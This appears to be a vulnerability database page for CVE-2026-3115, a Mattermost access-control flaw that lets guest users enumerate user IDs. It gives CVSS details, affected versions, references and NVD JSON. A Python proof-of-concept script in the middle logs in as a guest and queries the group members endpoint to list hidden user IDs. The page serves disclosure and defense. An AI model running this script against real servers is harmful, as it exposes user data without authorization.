CVE-2026-3115

Description

Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to apply view restrictions when retrieving group member IDs, which allows authenticated guest users to enumerate user IDs outside their allowed visibility scope via the group retrieval endpoint.. Mattermost Advisory ID: MMSA-2026-00594

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:* - VULNERABLE

Mattermost 11.2.x <= 11.2.2

Mattermost 10.11.x <= 10.11.10

Mattermost 11.4.x <= 11.4.0

Mattermost 11.3.x <= 11.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target configuration TARGET_URL = "https://mattermost.example.com" API_BASE = f"{TARGET_URL}/api/v4" # Low-privileged Guest credentials EMAIL = "[email protected]" PASSWORD = "password123" def login(): """Authenticate and retrieve session token.""" login_url = f"{API_BASE}/users/login" payload = { "login_id": EMAIL, "password": PASSWORD } try: response = requests.post(login_url, json=payload) if response.status_code == 200: token = response.headers.get("Token") print(f"[+] Login successful. Token: {token}") return token else: print(f"[-] Login failed: {response.text}") return None except Exception as e: print(f"[-] Connection error: {e}") return None def enumerate_user_ids(token, group_id): """Exploit the vulnerability to list group members.""" headers = {"Authorization": f"Bearer {token}"} # Vulnerable endpoint: /api/v4/groups/{group_id}/members exploit_url = f"{API_BASE}/groups/{group_id}/members" print(f"[*] Attempting to enumerate members for Group ID: {group_id}") try: response = requests.get(exploit_url, headers=headers) if response.status_code == 200: members = response.json() print(f"[+] Success! Found {len(members)} members:") for member in members: print(f" - User ID: {member.get('user_id')}") else: print(f"[-] Request failed with status {response.status_code}: {response.text}") except Exception as e: print(f"[-] Error during exploitation: {e}") if __name__ == "__main__": token = login() if token: # Replace with a valid or guessed Group ID target_group = "GROUP_ID_TO_TEST" enumerate_user_ids(token, target_group)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3115
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3115
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3115/
[4] VulDB https://vuldb.com/cve/CVE-2026-3115
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3115", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:42.660", "lastModified": "2026-03-30T19:40:01.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 fail to apply view restrictions when retrieving group member IDs, which allows authenticated guest users to enumerate user IDs outside their allowed visibility scope via the group retrieval endpoint.. Mattermost Advisory ID: MMSA-2026-00594"}, {"lang": "es", "value": "Las versiones de Mattermost 11.2.x <= 11.2.2, 10.11.x <= 10.11.10, 11.4.x <= 11.4.0, 11.3.x <= 11.3.1 no aplican las restricciones de visualización al recuperar los IDs de miembros de grupo, lo que permite a los usuarios invitados autenticados enumerar los IDs de usuario fuera de su ámbito de visibilidad permitido a través del endpoint de recuperación de grupo. ID de Aviso de Mattermost: MMSA-2026-00594"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.3", "matchCriteriaId": "7F64C167-943D-4F3F-9374-BCC8DECB3881"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.2", "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "7B6A1FE2-D980-4755-A838-190A53A4D62B"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}